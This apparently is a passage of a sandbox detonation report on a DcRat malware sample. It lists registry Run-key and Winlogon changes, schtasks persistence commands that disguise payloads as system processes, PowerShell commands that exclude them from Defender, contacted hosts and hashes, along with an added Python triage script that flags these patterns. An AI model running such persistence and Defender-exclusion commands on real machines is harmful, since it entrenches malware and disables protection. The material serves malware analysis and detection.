| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe
"C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\TAPI\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Windows\Setup\State\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\Setup\State\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\winlogon.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-US\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\AppPatch64\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\dwm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\winlogon.exe'
C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe
"C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe"
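The process list above (and the matching list under behavioral2) shows the whole persistence sequence in raw command lines: for each dropped binary, one schtasks task named after it that fires ONLOGON with /rl HIGHEST, one or two more named with an extra trailing letter that re-launch it every few minutes, and a powershell Add-MpPreference call that excludes the same path from Defender scanning. The script below is an added triage example, not code from the sandbox or from the malware: it parses such command lines into fields and flags the pattern. SAMPLE_CMDLINES is constructed from a subset of the lines on this page plus one benign control line; SYSTEM_PROCESS_NAMES and LEGIT_DIRS are hand-picked assumptions for this sample, not an exhaustive list.

```python
"""Triage helper for sandbox 'Processes' output: extract scheduled-task and
Defender-exclusion artefacts from raw command lines and flag the pattern of
system-process names dropped outside System32, ONLOGON plus MINUTE-interval
re-launch tasks, /rl HIGHEST and matching Add-MpPreference exclusions.

Added example for this page; not sandbox or malware code.
"""
import re

# Assumption: hand-picked from the file names used on this page, not exhaustive.
# "System" and "Idle" have no on-disk image at all, so a file with either name
# is suspect wherever it lives.
SYSTEM_PROCESS_NAMES = {
    "lsass", "winlogon", "csrss", "smss", "services", "wininit", "dwm",
    "dllhost", "sppsvc", "sppextcomobj", "runtimebroker", "backgroundtaskhost",
    "startmenuexperiencehost", "upfc", "registry", "system", "idle",
}
# Assumption: the only directories where those names legitimately live.
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample: command lines copied from the page, plus one benign control.
SAMPLE_CMDLINES = [
    r"""schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /f""",
    r"""schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\TAPI\dwm.exe'" /f""",
    r"""schtasks.exe /create /tn "NightlyBackup" /sc DAILY /tr "'C:\Tools\backup.exe'" /f""",  # constructed benign control
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'""",
    r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\dwm.exe'""",
]

TASK_RE = re.compile(
    r'/tn\s+"(?P<name>[^"]+)".*?/sc\s+(?P<schedule>\w+)(?:\s+/mo\s+(?P<modifier>\d+))?'
    r".*?/tr\s+\"'(?P<target>[^']+)'\"",
    re.IGNORECASE,
)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'(?P<path>[^']+)'", re.IGNORECASE)


def parse_schtasks(cmdline):
    """Fields of a 'schtasks /create' command line, or None for anything else."""
    if not re.match(r'\s*"?schtasks(\.exe)?"?\s+/create\b', cmdline, re.IGNORECASE):
        return None
    m = TASK_RE.search(cmdline)
    if not m:
        return None
    return {
        "name": m["name"],
        "schedule": m["schedule"].upper(),
        "modifier": int(m["modifier"]) if m["modifier"] else None,
        "target": m["target"],
        "highest": re.search(r"/rl\s+HIGHEST\b", cmdline, re.IGNORECASE) is not None,
    }


def parse_defender_exclusion(cmdline):
    """Path added with Add-MpPreference -ExclusionPath, or None."""
    m = EXCLUSION_RE.search(cmdline)
    return m["path"] if m else None


def is_masquerade(path):
    """True when the file name mimics a Windows system process but lives elsewhere."""
    low = path.lower()
    stem = low.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    return stem in SYSTEM_PROCESS_NAMES and not low.startswith(LEGIT_DIRS)


def triage(cmdlines):
    """Parse every line, keep the masquerading tasks and build a path IOC list."""
    tasks = [t for t in map(parse_schtasks, cmdlines) if t]
    exclusions = [p for p in map(parse_defender_exclusion, cmdlines) if p]
    excluded = {p.lower() for p in exclusions}
    suspicious = []
    for t in tasks:
        if not is_masquerade(t["target"]):
            continue
        notes = ["system-process name outside System32"]
        if t["schedule"] == "ONLOGON":
            notes.append("re-launched at every logon")
        elif t["schedule"] == "MINUTE":
            notes.append(f"re-launched every {t['modifier']} min")
        if t["highest"]:
            notes.append("runs with highest privileges (/rl HIGHEST)")
        if t["target"].lower() in excluded:
            notes.append("target also excluded from Defender scanning")
        suspicious.append({"task": t["name"], "target": t["target"], "notes": notes})
    iocs = sorted({s["target"] for s in suspicious} | set(exclusions))
    return {"tasks": tasks, "exclusions": exclusions, "suspicious": suspicious, "iocs": iocs}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for s in result["suspicious"]:
        print(f"[task {s['task']}] {s['target']}: " + "; ".join(s["notes"]))
    print("Defender exclusions:", *result["exclusions"], sep="\n  ")
    print("IOC paths:", *result["iocs"], sep="\n  ")
```

Run against the full process list of either detonation, `iocs` gives the set of dropped paths to sweep for on other hosts, and the task names (a system-process name, optionally with one extra letter appended) are a cheap hunt key in Task Scheduler event logs. The benign control line parses as a task but produces no finding, which is the point of keying on the masquerade rather than on schtasks use alone.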
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0913612.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
Files
memory/2976-0-0x000007FEF5E43000-0x000007FEF5E44000-memory.dmp
memory/2976-1-0x0000000000AB0000-0x0000000000CAA000-memory.dmp
memory/2976-2-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
memory/2976-3-0x0000000000440000-0x000000000044E000-memory.dmp
memory/2976-4-0x0000000000450000-0x0000000000458000-memory.dmp
memory/2976-5-0x0000000000460000-0x000000000047C000-memory.dmp
memory/2976-6-0x0000000000680000-0x0000000000690000-memory.dmp
memory/2976-7-0x00000000022C0000-0x00000000022D6000-memory.dmp
memory/2976-8-0x0000000000690000-0x00000000006A0000-memory.dmp
memory/2976-9-0x00000000009D0000-0x00000000009DC000-memory.dmp
memory/2976-10-0x0000000000AA0000-0x0000000000AB2000-memory.dmp
memory/2976-11-0x0000000002300000-0x000000000230C000-memory.dmp
memory/2976-12-0x0000000002310000-0x000000000231C000-memory.dmp
memory/2976-14-0x0000000002330000-0x000000000233C000-memory.dmp
memory/2976-13-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2976-15-0x00000000024A0000-0x00000000024AE000-memory.dmp
memory/2976-16-0x00000000024B0000-0x00000000024B8000-memory.dmp
memory/2976-17-0x000000001A940000-0x000000001A94E000-memory.dmp
memory/2976-18-0x000000001A950000-0x000000001A95C000-memory.dmp
memory/2976-19-0x000000001A9E0000-0x000000001A9EA000-memory.dmp
memory/2976-20-0x000000001A9F0000-0x000000001A9FC000-memory.dmp
memory/2976-21-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe
| MD5 | 2a0c47d8f5e14cfda0437c59c57fbce9 |
| SHA1 | a1c37d6d20049b2bc1a1db1d99b4f5b7fcd9c2b0 |
| SHA256 | 22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 |
| SHA512 | 790702639348c58c99dcf4bd35d3b47bd544c7e4cd43fab90b5643f2917e3549e8e92a09d7aea3fed05766c086bdecdadf70c392289c46dc667e69cde73595d5 |
C:\Windows\Setup\State\winlogon.exe
| MD5 | f1a506183dcb001c72b644f5b2c1b9a5 |
| SHA1 | f5d463cadf72764829af7926b43cdffa99275672 |
| SHA256 | 0ae87b9b0dd457ba043a2f86f5321a56b854b2cdb6fd9c2bba8abd9239d8fa55 |
| SHA512 | 2221b8a48fd43353e646055bfb9297c58d2e21ec8c3b4986298645adfc36fd445a9bada6fced95c954a835e3315a00f8bf0c13422c3f890e1703af2126c1df1a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | de764633ed11d0b919fa4c209be43d98 |
| SHA1 | 7535b1388257533cf61ade286977d69a827c4b46 |
| SHA256 | 82f7d7612520353f1589f43a088a156bbe085bd175897bd7cc8a91b80398a3d4 |
| SHA512 | b521a79a86f3f3259b778231c52e2896f28ed417fab6f713989587bae276a6dfe3cb20b6820d5bbc31509ab69e27f68513313dfabcea6ccd71e896b402d95fa1 |
memory/2704-167-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2576-168-0x0000000002890000-0x0000000002898000-memory.dmp
memory/2028-233-0x0000000000190000-0x000000000038A000-memory.dmp
memory/2976-234-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
memory/2028-240-0x0000000002190000-0x00000000021A2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 02:49
Reported
2024-06-01 02:51
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
